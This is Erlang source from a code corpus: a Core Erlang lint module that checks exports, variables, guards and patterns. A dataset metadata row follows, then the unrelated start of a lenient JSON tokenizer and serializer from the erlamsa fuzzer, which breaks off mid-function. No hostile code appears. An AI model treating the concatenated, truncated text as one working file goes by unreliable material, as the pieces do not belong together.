%% Lint a Core Erlang module: validate exports and attributes, lint each
%% definition, then verify every exported function is defined.
module(#c_module{name = Name, exports = Es, attrs = As, defs = Ds}, _Opts) ->
    Defined = defined_funcs(Ds),
    St0 = #lint{module = Name#c_literal.val},
    St1 = check_attrs(As, check_exports(Es, St0)),
    St2 = module_defs(Ds, Defined, St1),
    return_status(check_state(Es, Defined, St2)).
%% defined_funcs([FuncDef]) -> [Fname].
%%  Ordset of {Name,Arity} for every function defined in the module.
defined_funcs(Fs) ->
    foldl(fun ({#c_var{name={_I,_A}=IA},_}, Def) ->
                  add_element(IA, Def)
          end, [], Fs).
%% return_status(State) ->
%%      {ok,[Warning]} | {error,[Error],[Warning]}
%%  Pack errors and warnings properly and return ok | error.
%%  Errors and warnings were accumulated in reverse order.
return_status(St) ->
    Ws = reverse(St#lint.warnings),
    case reverse(St#lint.errors) of
        [] -> {ok,[{St#lint.module,Ws}]};
        Es -> {error,[{St#lint.module,Es}],[{St#lint.module,Ws}]}
    end.
%% add_error(ErrorDescriptor, State) -> State'
%% add_warning(ErrorDescriptor, State) -> State'
%%  Note that we don't use line numbers here.
add_error(E, St) -> St#lint{errors=[{none,?MODULE,E}|St#lint.errors]}.
%%add_warning(W, St) -> St#lint{warnings=[{none,core_lint,W}|St#lint.warnings]}.
%% Every export must be a variable naming a function: {atom, arity}.
check_exports(Es, St) ->
    IsFname = fun (#c_var{name = {Name, Arity}})
                    when is_atom(Name), is_integer(Arity) -> true;
                  (_) -> false
              end,
    case all(IsFname, Es) of
        true -> St;
        false -> add_error(invalid_exports, St)
    end.

%% Every attribute must be a {Literal, Literal} pair.
check_attrs(As, St) ->
    IsAttr = fun ({#c_literal{}, #c_literal{}}) -> true;
                 (_) -> false
             end,
    case all(IsAttr, As) of
        true -> St;
        false -> add_error(invalid_attributes, St)
    end.
%% check_state(Exports, Defined, State) -> State.
%%  Verify that every exported function is actually defined.
check_state(Es, Defined, St) ->
    foldl(fun (#c_var{name={_N,_A}=F}, St1) ->
                  case is_element(F, Defined) of
                      true -> St1;
                      %% Fix: accumulate onto St1 (the fold accumulator)
                      %% rather than the initial St — the old code
                      %% silently dropped all but the last
                      %% undefined-export error.
                      false -> add_error({undefined_function,F}, St1)
                  end
          end, St, Es).
%% module_defs(CoreBody, Defined, State) -> State.
%%  Lint every top-level definition, recording its {Name,Arity} as the
%%  "current function" so error messages can name it.
module_defs(B, Def, St) ->
    %% Set top level function name.
    foldl(fun (Func, St0) ->
                  {#c_var{name={_F,_A}=FA},_} = Func,
                  St1 = St0#lint{func=FA},
                  function(Func, Def, St1)
          end, St, B).
%% functions([Fdef], Defined, RetCount, State) -> State.
%%  Lint a list of (letrec-style) function definitions; each body is
%%  checked with the fun's parameters added to the defined variables.
functions(Fs, Def, Rt, St0) ->
    foldl(fun ({_Name,#c_fun{vars=Vs,body=B}}, Sti0) ->
                  {Vvs,St} = variable_list(Vs, Sti0),
                  body(B, union(Vvs, Def), Rt, St);
              (_, St) ->
                  add_error({illegal_expr,St#lint.func}, St)
          end, St0, Fs).
%% function(CoreFunc, Defined, State) -> State.
function({#c_var{name={_,_}},B}, Def, St) ->
    %% Body must be a fun!
    case B of
        #c_fun{} -> expr(B, Def, 1, St);
        _ -> add_error({illegal_expr,St#lint.func}, St)
    end.
%% body(Expr, Defined, RetCount, State) -> State.
body(#c_values{es=Es}, Def, Rt, St) ->
return_match(Rt, length(Es), expr_list(Es, Def, St));
body(E, Def, Rt, St0) ->
St1 = expr(E, Def, Rt, St0),
case is_simple_top(E) of
true -> return_match(Rt, 1, St1);
false -> St1
end.
%% guard(Expr, Defined, State) -> State.
%% Guards are boolean expressions with test wrapped in a protected.
guard(Expr, Def, St) -> gexpr(Expr, Def, 1, St).
%% guard_list([Expr], Defined, State) -> State.
%% guard_list(Es, Def, St0) ->
%% foldl(fun (E, St) -> guard(E, Def, St) end, St0, Es).
%% gbody(Expr, Defined, RetCount, State) -> State.
gbody(#c_values{es=Es}, Def, Rt, St) ->
return_match(Rt, length(Es), gexpr_list(Es, Def, St));
gbody(E, Def, Rt, St0) ->
St1 = gexpr(E, Def, Rt, St0),
case is_simple_top(E) of
true -> return_match(Rt, 1, St1);
false -> St1
end.
gexpr(#c_var{name=N}, Def, Rt, St) when is_atom(N); is_integer(N) ->
return_match(Rt, 1, expr_var(N, Def, St));
gexpr(#c_literal{}, _Def, Rt, St) ->
return_match(Rt, 1, St);
gexpr(#c_cons{hd=H,tl=T}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list([H,T], Def, St));
gexpr(#c_tuple{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list(Es, Def, St));
gexpr(#c_map{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list(Es, Def, St));
gexpr(#c_map_pair{key=K,val=V}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list([K,V], Def, St));
gexpr(#c_binary{segments=Ss}, Def, Rt, St) ->
return_match(Rt, 1, gbitstr_list(Ss, Def, St));
gexpr(#c_seq{arg=Arg,body=B}, Def, Rt, St0) ->
St1 = gexpr(Arg, Def, 1, St0),
return_match(Rt, 1, gbody(B, Def, Rt, St1));
gexpr(#c_let{vars=Vs,arg=Arg,body=B}, Def, Rt, St0) ->
St1 = gbody(Arg, Def, let_varcount(Vs), St0), %This is a guard body
{Lvs,St2} = variable_list(Vs, St1),
gbody(B, union(Lvs, Def), Rt, St2);
gexpr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=is_record},
args=[Arg,#c_literal{val=Tag},#c_literal{val=Size}]},
Def, Rt, St) when is_atom(Tag), is_integer(Size) ->
return_match(Rt, 1, gexpr(Arg, Def, 1, St));
gexpr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=is_record}},
_Def, Rt, St) ->
return_match(Rt, 1, add_error({illegal_guard,St#lint.func}, St));
gexpr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=Name},args=As},
Def, Rt, St0) when is_atom(Name) ->
St1 = return_match(Rt, 1, St0),
case is_guard_bif(Name, length(As)) of
true ->
gexpr_list(As, Def, St1);
false ->
add_error({illegal_guard,St1#lint.func}, St1)
end;
gexpr(#c_primop{name=#c_literal{val=A},args=As}, Def, _Rt, St0) when is_atom(A) ->
gexpr_list(As, Def, St0);
gexpr(#c_try{arg=E,vars=[#c_var{name=X}],body=#c_var{name=X},
evars=[#c_var{},#c_var{}],handler=#c_literal{val=false}},
Def, Rt, St) ->
gbody(E, Def, Rt, St);
gexpr(#c_case{arg=Arg,clauses=Cs}, Def, Rt, St0) ->
PatCount = case_patcount(Cs),
St1 = gbody(Arg, Def, PatCount, St0),
clauses(Cs, Def, PatCount, Rt, St1);
gexpr(_Core, _, _, St) ->
%%io:fwrite("clint gexpr: ~p~n", [_Core]),
add_error({illegal_guard,St#lint.func}, St).
%% gexpr_list([Expr], Defined, State) -> State.
gexpr_list(Es, Def, St0) ->
foldl(fun (E, St) -> gexpr(E, Def, 1, St) end, St0, Es).
%% gbitstr_list([Elem], Defined, State) -> State.
gbitstr_list(Es, Def, St0) ->
foldl(fun (E, St) -> gbitstr(E, Def, St) end, St0, Es).
gbitstr(#c_bitstr{val=V,size=S}, Def, St) ->
gexpr_list([V,S], Def, St).
%% is_guard_bif(Name, Arity) -> Boolean.
is_guard_bif(Name, Arity) ->
erl_internal:guard_bif(Name, Arity)
orelse erl_internal:arith_op(Name, Arity)
orelse erl_internal:bool_op(Name, Arity)
orelse erl_internal:comp_op(Name, Arity).
%% expr(Expr, Defined, RetCount, State) -> State.
expr(#c_var{name={_,_}=FA}, Def, Rt, St) ->
return_match(Rt, 1, expr_fname(FA, Def, St));
expr(#c_var{name=N}, Def, Rt, St) ->
return_match(Rt, 1, expr_var(N, Def, St));
expr(#c_literal{}, _Def, Rt, St) ->
return_match(Rt, 1, St);
expr(#c_cons{hd=H,tl=T}, Def, Rt, St) ->
return_match(Rt, 1, expr_list([H,T], Def, St));
expr(#c_tuple{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, expr_list(Es, Def, St));
expr(#c_map{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, expr_list(Es, Def, St));
expr(#c_map_pair{key=K,val=V}, Def, Rt, St) ->
return_match(Rt, 1, expr_list([K,V], Def, St));
expr(#c_binary{segments=Ss}, Def, Rt, St) ->
return_match(Rt, 1, bitstr_list(Ss, Def, St));
expr(#c_fun{vars=Vs,body=B}, Def, Rt, St0) ->
{Vvs,St1} = variable_list(Vs, St0),
return_match(Rt, 1, body(B, union(Vvs, Def), 1, St1));
expr(#c_seq{arg=Arg,body=B}, Def, Rt, St0) ->
St1 = expr(Arg, Def, 1, St0),
body(B, Def, Rt, St1);
expr(#c_let{vars=Vs,arg=Arg,body=B}, Def, Rt, St0) ->
St1 = body(Arg, Def, let_varcount(Vs), St0), %This is a body
{Lvs,St2} = variable_list(Vs, St1),
body(B, union(Lvs, Def), Rt, St2);
expr(#c_letrec{defs=Fs,body=B}, Def0, Rt, St0) ->
Def1 = union(defined_funcs(Fs), Def0), %All defined stuff
St1 = functions(Fs, Def1, Rt, St0),
body(B, Def1, Rt, St1#lint{func=St0#lint.func});
expr(#c_case{arg=Arg,clauses=Cs}, Def, Rt, St0) ->
Pc = case_patcount(Cs),
St1 = body(Arg, Def, Pc, St0),
clauses(Cs, Def, Pc, Rt, St1);
expr(#c_receive{clauses=Cs,timeout=T,action=A}, Def, Rt, St0) ->
St1 = expr(T, Def, 1, St0),
St2 = body(A, Def, Rt, St1),
clauses(Cs, Def, 1, Rt, St2);
expr(#c_apply{op=Op,args=As}, Def, _Rt, St0) ->
St1 = apply_op(Op, Def, length(As), St0),
return_match(any, 1, expr_list(As, Def, St1));
expr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=Name},args=As},
Def, Rt, St0) when is_atom(Name) ->
St1 = expr_list(As, Def, St0),
case erl_bifs:is_exit_bif(erlang, Name, length(As)) of
true -> St1;
false -> return_match(Rt, 1, St1)
end;
expr(#c_call{module=M,name=N,args=As}, Def, _Rt, St0) ->
St1 = expr(M, Def, 1, St0),
St2 = expr(N, Def, 1, St1),
expr_list(As, Def, St2);
expr(#c_primop{name=#c_literal{val=A},args=As}, Def, Rt, St0) when is_atom(A) ->
St1 = expr_list(As, Def, St0),
case A of
match_fail -> St1;
recv_peek_message -> return_match(Rt, 2, St1);
_ -> return_match(Rt, 1, St1)
end;
expr(#c_catch{body=B}, Def, Rt, St) ->
return_match(Rt, 1, body(B, Def, 1, St));
expr(#c_try{arg=A,vars=Vs,body=B,evars=Evs,handler=H}, Def, Rt, St0) ->
St1 = case Evs of
[_, _, _] -> St0;
_ -> add_error({illegal_try,St0#lint.func}, St0)
end,
St2 = body(A, Def, let_varcount(Vs), St1),
{Ns,St3} = variable_list(Vs, St2),
St4 = body(B, union(Ns, Def), Rt, St3),
{Ens,St5} = variable_list(Evs, St4),
body(H, union(Ens, Def), Rt, St5);
expr(_Other, _, _, St) ->
%%io:fwrite("clint expr: ~p~n", [_Other]),
add_error({illegal_expr,St#lint.func}, St).
%% expr_list([Expr], Defined, State) -> State.
expr_list(Es, Def, St0) ->
foldl(fun (E, St) -> expr(E, Def, 1, St) end, St0, Es).
%% bitstr_list([Elem], Defined, State) -> State.
bitstr_list(Es, Def, St0) ->
foldl(fun (E, St) -> bitstr(E, Def, St) end, St0, Es).
bitstr(#c_bitstr{val=V,size=S}, Def, St) ->
expr_list([V,S], Def, St).
%% apply_op(Op, Defined, ArgCount, State) -> State.
%% A apply op is either an fname or an expression.
apply_op(#c_var{name={_I,A}=IA}, Def, Ac, St0) ->
St1 = expr_fname(IA, Def, St0),
arg_match(Ac, A, St1);
apply_op(E, Def, _, St) -> expr(E, Def, 1, St). %Hard to check
%% expr_var(VarName, Defined, State) -> State.
expr_var(N, Def, St) ->
case is_element(N, Def) of
true -> St;
false -> add_error({unbound_var,N,St#lint.func}, St)
end.
%% expr_fname(Fname, Defined, State) -> State.
expr_fname(Fname, Def, St) ->
case is_element(Fname, Def) of
true -> St;
false -> add_error({undefined_function,Fname,St#lint.func}, St)
end.
%% let_varcount([Var]) -> int().
let_varcount([]) -> any; %Ignore values
let_varcount(Es) -> length(Es).
%% case_patcount([Clause]) -> int().
case_patcount([#c_clause{pats=Ps}|_]) -> length(Ps).
%% clauses([Clause], Defined, PatCount, RetCount, State) -> State.
clauses(Cs, Def, Pc, Rt, St0) ->
foldl(fun (C, St) -> clause(C, Def, Pc, Rt, St) end, St0, Cs).
%% clause(Clause, Defined, PatCount, RetCount, State) -> State.
clause(#c_clause{pats=Ps,guard=G,body=B}, Def0, Pc, Rt, St0) ->
St1 = pattern_match(Pc, length(Ps), St0),
{Pvs,St2} = pattern_list(Ps, Def0, St1),
Def1 = union(Pvs, Def0),
St3 = guard(G, Def1, St2),
body(B, Def1, Rt, St3).
%% variable(Var, [PatVar], State) -> {[VarName],State}.
variable(#c_var{name=N}, Ps, St) ->
case is_element(N, Ps) of
true -> {[],add_error({duplicate_var,N,St#lint.func}, St)};
false -> {[N],St}
end;
variable(_, Def, St) -> {Def,add_error({not_var,St#lint.func}, St)}.
%% variable_list([Var], State) -> {[Var],State}.
%% variable_list([Var], [PatVar], State) -> {[Var],State}.
variable_list(Vs, St) -> variable_list(Vs, [], St).
variable_list(Vs, Ps, St) ->
foldl(fun (V, {Ps0,St0}) ->
{Vvs,St1} = variable(V, Ps0, St0),
{union(Vvs, Ps0),St1}
end, {Ps,St}, Vs).
%% pattern(Pattern, Defined, State) -> {[PatVar],State}.
%% pattern(Pattern, Defined, [PatVar], State) -> {[PatVar],State}.
%% Patterns are complicated by sizes in binaries. These are pure
%% input variables which create no bindings. We, therefore, need to
%% carry around the original defined variables to get the correct
%% handling.
%% pattern(P, Def, St) -> pattern(P, Def, [], St).
pattern(#c_var{name=N}, Def, Ps, St) ->
pat_var(N, Def, Ps, St);
pattern(#c_literal{}, _Def, Ps, St) -> {Ps,St};
pattern(#c_cons{hd=H,tl=T}, Def, Ps, St) ->
pattern_list([H,T], Def, Ps, St);
pattern(#c_tuple{es=Es}, Def, Ps, St) ->
pattern_list(Es, Def, Ps, St);
pattern(#c_map{es=Es}, Def, Ps, St) ->
pattern_list(Es, Def, Ps, St);
pattern(#c_map_pair{op=#c_literal{val=exact},key=K,val=V}, Def, Ps, St) ->
%% The key is an input.
pat_map_expr(K, Def, St),
pattern_list([V],Def,Ps,St);
pattern(#c_binary{segments=Ss}, Def, Ps, St0) ->
St = pat_bin_tail_check(Ss, St0),
pat_bin(Ss, Def, Ps, St);
pattern(#c_alias{var=V,pat=P}, Def, Ps, St0) ->
{Vvs,St1} = variable(V, Ps, St0),
pattern(P, Def, union(Vvs, Ps), St1);
pattern(_Other, _, Ps, St) ->
%%io:fwrite("clint pattern: ~p~n", [_Other]),
{Ps,add_error({not_pattern,St#lint.func}, St)}.
pat_var(N, _Def, Ps, St) ->
case is_element(N, Ps) of
true -> {Ps,add_error({duplicate_var,N,St#lint.func}, St)};
false -> {add_element(N, Ps),St}
end.
%% pat_bin_list([Elem], Defined, [PatVar], State) -> {[PatVar],State}.
pat_bin(Es, Def, Ps0, St0) ->
foldl(fun (E, {Ps,St}) ->
pat_segment(E, Def, Ps, St)
end, {Ps0,St0}, Es).
pat_segment(#c_bitstr{val=V,size=S,type=T}, Def, Ps0, St0) ->
St1 = pat_bit_expr(S, T, Def, St0),
pattern(V, Def, Ps0, St1);
pat_segment(_, _, Ps, St) ->
{Ps,add_error({not_bs_pattern,St#lint.func}, St)}.
%% pat_bin_tail_check([Elem], State) -> State.
%% There must be at most one tail segment (a size-less segment of
%% type binary) and it must occur at the end.
pat_bin_tail_check([#c_bitstr{size=#c_literal{val=all}}], St) ->
%% Size-less field is OK at the end of the list of segments.
St;
pat_bin_tail_check([#c_bitstr{size=#c_literal{val=all}}|_], St) ->
add_error({tail_segment_not_at_end,St#lint.func}, St);
pat_bin_tail_check([_|Ss], St) ->
pat_bin_tail_check(Ss, St);
pat_bin_tail_check([], St) -> St.
%% pat_bit_expr(SizePat, Type, Defined, State) -> State.
%% Check the Size pattern, this is an input! Because of optimizations,
%% we must allow any kind of constant and literal here.
pat_bit_expr(#c_var{name=N}, _, Def, St) -> expr_var(N, Def, St);
pat_bit_expr(#c_literal{}, _, _, St) -> St;
pat_bit_expr(#c_binary{}, _, _Def, St) ->
%% Literal binaries may be expressed as a bit syntax construction
%% expression if such expression is more compact than the literal.
%% Example: <<0:100000000>>
St;
pat_bit_expr(_, _, _, St) ->
add_error({illegal_expr,St#lint.func}, St).
pat_map_expr(#c_var{name=N}, Def, St) -> expr_var(N, Def, St);
pat_map_expr(#c_literal{}, _Def, St) -> St;
pat_map_expr(_, _, St) -> add_error({illegal_expr,St#lint.func}, St).
%% pattern_list([Var], Defined, State) -> {[PatVar],State}.
%% pattern_list([Var], Defined, [PatVar], State) -> {[PatVar],State}.
pattern_list(Pats, Def, St) -> pattern_list(Pats, Def, [], St).
pattern_list(Pats, Def, Ps0, St0) ->
foldl(fun (P, {Ps,St}) -> pattern(P, Def, Ps, St) end, {Ps0,St0}, Pats).
%% pattern_match(Required, Supplied, State) -> State.
%% Check that the required number of patterns match the supplied.
pattern_match(N, N, St) -> St;
pattern_match(_Req, _Sup, St) ->
add_error({pattern_mismatch,St#lint.func}, St).
%% return_match(Required, Supplied, State) -> State.
%% Check that the required number of return values match the supplied.
return_match(any, _Sup, St) -> St;
return_match(N, N, St) -> St;
return_match(_Req, _Sup, St) ->
add_error({return_mismatch,St#lint.func}, St).
%% arg_match(Required, Supplied, State) -> State.
arg_match(N, N, St) -> St;
arg_match(_Req, _Sup, St) ->
add_error({arg_mismatch,St#lint.func}, St).
%% Only check if the top-level is a simple.
-spec is_simple_top(cerl:cerl()) -> boolean().
is_simple_top(#c_var{}) -> true;
is_simple_top(#c_cons{}) -> true;
is_simple_top(#c_tuple{}) -> true;
is_simple_top(#c_binary{}) -> true;
is_simple_top(#c_literal{}) -> true;
is_simple_top(_) -> false. | lib/compiler/src/core_lint.erl | 0.604632 | 0.431824 | core_lint.erl | starcoder |
% Copyright (c) 2014-2018 <NAME> aka dark_k3y
% Initial implementation was a little slow, so:
% - several optimization approaches are heavily based on the JSONE implementation
% by Copyright (c) 2013-2016, <NAME> <<EMAIL>> (MIT LICENSE)
% see https://github.com/sile/jsone/blob/master/src/jsone_decode.erl
% for more details
% Usage of original JSONE was not possible due to the fact, that
% erlamsa should be able to parse badly crafted JSON docs
%
% LICENSE
%
% Permission is hereby granted, free of charge, to any person obtaining a copy
% of this software and associated documentation files (the "Software"), to deal
% in the Software without restriction, including without limitation the rights
% to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
% copies of the Software, and to permit persons to whom the Software is
% furnished to do so, subject to the following conditions:
%
% The above copyright notice and this permission notice shall be included in
% all copies or substantial portions of the Software.
%
% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
% SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
% DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
% OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
% THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-module(erlamsa_json).
-author("dark_k3y").
-compile([export_all]).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-compile([export_all]).
-endif.
-include("erlamsa.hrl").
%% API
-export([tokenize/1, tokens_to_erlang/1]).
-define(NOT_SEPARATOR(C),
C =/= $ , C =/= $\n, C =/= $\r, C =/= $\t, C =/= $,, C =/= $], C =/= $}, C =/= $:).
%% TODO: add specs
%%%
%%% Generic functions
%%%
%% Map Fun over List, interleaving a comma ($,) between consecutive
%% results; the final element gets no trailing comma. Result order is
%% preserved (accumulator is built reversed, then reversed back).
fold_list(Fun, [Last], Done) ->
    fold_list(Fun, [], [Fun(Last) | Done]);
fold_list(Fun, [Item | More], Done) ->
    fold_list(Fun, More, [[Fun(Item), $,] | Done]);
fold_list(_Fun, [], Done) ->
    lists:reverse(Done).
%%%
%%% /Generic functions
%%%
%%%
%%% JSON tokenizer
%%%
% Grammar derived from https://tools.ietf.org/html/rfc7159
% document: ws value ws
% ws : \x20 | \t | \r | \n
% value: string | number | object | array | true | false | null
% elements: value | value ws , ws elements
% array: ws [ ws ] | ws [ ws elements ws ]
% object: ws { ws } | ws { ws members ws }
% members: pair | pair ws , ws members
% pair: string : value
%% document is a ws
%% Tokenize a JSON binary into a list of AST tokens such as
%% {object, Pairs}, {array, Elems}, {pair, K, V}, {string, Chars},
%% {number, Chars} and {constant, true|false|null}. Starts the state
%% machine expecting one top-level value; throws incorrect_json on
%% input the (deliberately lenient) tokenizer cannot recover from.
tokenize(Bin) ->
    lists:reverse(ws(Bin, [value], [])).
%% Skip insignificant whitespace, then dispatch on the top of the
%% parser context stack. The stack records which construct we are
%% currently inside; Acc collects finished top-level tokens in reverse
%% order (tokenize/1 reverses it at the end).
ws(<<$\t, Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
ws(<<$\n, Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
ws(<<$\r, Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
ws(<<$ , Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
%% End of input: return whatever has been accumulated so far.
ws(<<>>, _, Acc) -> Acc;
ws(Bin, Context = [Term|RestContext], Acc) ->
    %io:format("111111 ~p~n", [Bin]),
    case Term of
        array -> array(Bin, [array_end|RestContext], Acc);
        {elements, List} -> elements(Bin, RestContext, List, Acc);
        object -> object(Bin, [object_end|RestContext], Acc);
        {members, Pairs} -> members(Bin, RestContext, Pairs, Acc);
        pair -> pair(Bin, RestContext, Acc);
        %% pair_delim keeps the whole Context so pair/3 can match it.
        pair_delim -> pair(Bin, Context, Acc);
        value -> value(Bin, RestContext, Acc)
    end;
%% Non-empty input with an exhausted context stack: trailing garbage.
ws(_, _, _) -> throw(incorrect_json).
%% Parse a single JSON value at the current position. Composite values
%% push array/object frames on the context stack; literal keywords and
%% strings are delivered directly via push/4.
value(<<$[, Rest/binary>>, Context, Acc) ->
    ws(Rest, [array|Context], Acc);
value(<<${, Rest/binary>>, Context, Acc) ->
    ws(Rest, [object|Context], Acc);
value(<<"true", Rest/binary>>, Context, Acc) ->
    push(Rest, Context, {constant, true}, Acc);
value(<<"false", Rest/binary>>, Context, Acc) ->
    push(Rest, Context, {constant, false}, Acc);
value(<<"null", Rest/binary>>, Context, Acc) ->
    push(Rest, Context, {constant, null}, Acc);
value(<<$", Rest/binary>>, Context, Acc) ->
    string(Rest, Context, [], Acc);
%% Anything else becomes a number-ish token; the tokenizer is
%% intentionally lenient so badly crafted JSON still tokenizes.
value(Bin, Context, Acc) ->
    number(Bin, Context, Acc).
%% Arrays
%% An immediate $] closes an empty array; otherwise parse the first
%% element with an {elements, []} accumulator frame beneath it.
array(<<$], Rest/binary>>, [array_end|Context], Acc) ->
    %io:format("0]~n"),
    push(Rest, Context, {array, []}, Acc);
array(Bin, Context, Acc) ->
    ws(Bin, [value, {elements, []}|Context], Acc).
%% Continue an array after an element: $] closes it (restoring source
%% order), $, starts the next element, anything else is a syntax error.
elements(<<$], Rest/binary>>, [array_end|Context], List, Acc) ->
    %io:format("1]~n"),
    push(Rest, Context, {array, lists:reverse(List)}, Acc);
elements(<<$,, Rest/binary>>, Context, List, Acc) ->
    ws(Rest, [value, {elements, List}|Context], Acc);
elements(<<_C:8, _Rest/binary>>, _Context, _List, _Acc) ->
    throw(incorrect_json).
%% Objects
%% An immediate $} closes an empty object; otherwise parse the first
%% key/value pair with a {members, []} accumulator frame beneath it.
object(<<$}, Rest/binary>>, [object_end|Context], Acc) ->
    %io:format("mmmmmm~n"),
    push(Rest, Context, {object, []}, Acc);
object(Bin, Context, Acc) ->
    ws(Bin, [pair, {members, []}|Context], Acc).
%% Continue an object after a pair: $} closes it (restoring source
%% order), $, starts the next pair, anything else is a syntax error.
members(<<$}, Rest/binary>>, [object_end|Context], Pairs, Acc) ->
    %io:format("nnnnnnnnn ~p~n", [{Rest, [value|Context], [{object, lists:reverse(Pairs)}|Acc]}]),
    push(Rest, Context, {object, lists:reverse(Pairs)}, Acc);
members(<<$,, Rest/binary>>, Context, Pairs, Acc) ->
    ws(Rest, [pair, {members, Pairs}|Context], Acc);
members(<<_C:8, _Rest/binary>>, _Context, _Pairs, _Acc) ->
    throw(incorrect_json).
%% Parse one "key : value" pair. The first pass parses the key under a
%% pair_delim marker; once $: is seen the value side is parsed under a
%% pair_end marker so push/4 can assemble the {pair, K, V} token.
pair(<<$:, Rest/binary>>, [pair_delim | Context], Acc) ->
    %io:format("1: ~p~n", [{Rest, Context, Acc}]),
    ws(Rest, [value, pair_end | Context], Acc);
pair(Bin, Context, Acc) ->
    %io:format("2: ~p~n", [{Bin, Context, Acc}]),
    ws(Bin, [value, pair_delim | Context], Acc).
%% Primitive values parsing
%% Deliver a finished token Value to the innermost open construct on
%% the context stack (array elements, object members, or a pair being
%% built), or to the top-level accumulator when the stack is empty.
push(Bin, [], Value, Acc) ->
    ws(Bin, [], [Value|Acc]);
push(Bin, [{elements, List} | Context], Value, Acc) ->
    %io:format("!!!!~p, ~p, ~p~n", [Bin, [{elements, [Value|List]} | Context], Acc]),
    ws(Bin, [{elements, [Value|List]} | Context], Acc);
push(Bin, [{members, List} | Context], Value, Acc) ->
    %io:format("!!!!~p, ~p, ~p~n", [Bin, [{members, [Value|List]} | Context], Acc]),
    ws(Bin, [{members, [Value|List]} | Context], Acc);
%% A pair's key has just been parsed: remember it and go look for the
%% $: delimiter plus the value.
push(Bin, [pair_delim | Context], Key, Acc) ->
    ws(Bin, [pair_delim, {pair_start, Key} | Context], Acc);
%% A pair's value has just been parsed: emit the complete pair upward.
push(Bin, [pair_end, {pair_start, Key} | Context], Value, Acc) ->
    push(Bin, Context, {pair, Key, Value}, Acc);
push(_, _, _, _) -> throw(incorrect_json).
%% TODO: more effective way to handle big strings
%% this may be slow in some cases
%% Scan a double-quoted string body one byte at a time. Escapes are
%% not interpreted; bytes are collected verbatim so that malformed
%% JSON can still round-trip through the fuzzer.
string(<<>>, Context, SoFar, Acc) ->
    %% Input ended before the closing quote: keep what was seen, with
    %% the opening quote re-attached, tagged as junk.
    push(<<>>, Context, {junkstring, lists:reverse([$" | SoFar])}, Acc);
string(<<$", Tail/binary>>, Context, SoFar, Acc) ->
    push(Tail, Context, {string, lists:reverse(SoFar)}, Acc);
string(<<Ch:8, Tail/binary>>, Context, SoFar, Acc) ->
    string(Tail, Context, [Ch | SoFar], Acc).
%% Start a number-ish token: at least one non-separator byte required.
%% Anything up to the next separator is accepted, so malformed numerals
%% are captured too (validated later, e.g. by tokens_to_erlang/1).
number(<<C:8, Rest/binary>>, Context, Acc) when ?NOT_SEPARATOR(C) ->
    number_rest(Rest, Context, [C], Acc);
number(_, _, _) -> throw(incorrect_json).
%% Accumulate the remaining bytes of a number-ish token; push it once
%% a separator (or end of input) is reached.
number_rest(<<C:8, Rest/binary>>, Context, N, Acc) when ?NOT_SEPARATOR(C) ->
    number_rest(Rest, Context, [C|N], Acc);
number_rest(Bin, Context, N, Acc) ->
    push(Bin, Context, {number, lists:reverse(N)}, Acc).
%%%
%%% /JSON tokenizer
%%%
%%%
%%% JSON AST -> Erlang dictionaries
%%%
%% Convert a token AST (as produced by tokenize/1) into plain Erlang
%% terms: objects become maps, arrays become lists, pairs become
%% {Key, Value} tuples, strings become char lists, and numbers become
%% integers/floats (or the atom invalid_number when unparsable).
%% Unknown tokens (e.g. {constant, true}) pass through unchanged.
tokens_to_erlang(Ast) when is_list(Ast) ->
    lists:map(fun tokens_to_erlang/1, Ast);
tokens_to_erlang({object, Lst}) ->
    Pairs = lists:map(fun tokens_to_erlang/1, Lst),
    lists:foldl(fun ({Key, Value}, Acc) -> maps:put(Key, Value, Acc) end,
                maps:new(), Pairs);
tokens_to_erlang({array, Lst}) ->
    lists:map(fun tokens_to_erlang/1, Lst);
tokens_to_erlang({pair, Key, Value}) ->
    {tokens_to_erlang(Key), tokens_to_erlang(Value)};
tokens_to_erlang({string, Value}) ->
    Value;
tokens_to_erlang({number, Value}) ->
    %% Try float first, then integer; either must consume the whole
    %% string. This replaces the former nested try/catch (the old
    %% "fix me" TODO) without changing the results.
    case string:to_float(Value) of
        {Float, []} -> Float;
        _ ->
            case string:to_integer(Value) of
                {Int, []} -> Int;
                _ -> invalid_number
            end
    end;
tokens_to_erlang(Token) ->
    Token.
%%%
%%% /JSON AST -> Erlang dictionaries
%%%
%%%
%%% JSON AST Folder
%%%
%% TODO: beautify parameter to insert ' ' and '\n'
%% handle incorrect AST that could appear during mutations
fold_ast_noarray(H, Acc) when is_list(H), length(H) > 1 ->
M = fold_list(fun (A) -> fold_ast(A, []) end, H, []),
fold_ast([], [M | Acc]);
fold_ast_noarray(H, Acc) ->
fold_ast(H, Acc).
fold_ast([H], Acc) ->
fold_ast(H, Acc);
fold_ast({pair, P1, P2}, Acc) ->
P1Json = fold_ast(P1, []),
P2Json = fold_ast(P2, []),
[P1Json, ":", P2Json | Acc];
fold_ast({junkstring, Value}, Acc) ->
[$", Value, $" | Acc];
fold_ast({string, Value}, Acc) ->
[$", Value, $" | Acc];
fold_ast({constant, Value}, Acc) when is_atom(Value) ->
[atom_to_list(Value) | Acc];
fold_ast({number, Value}, Acc) ->
[Value | Acc];
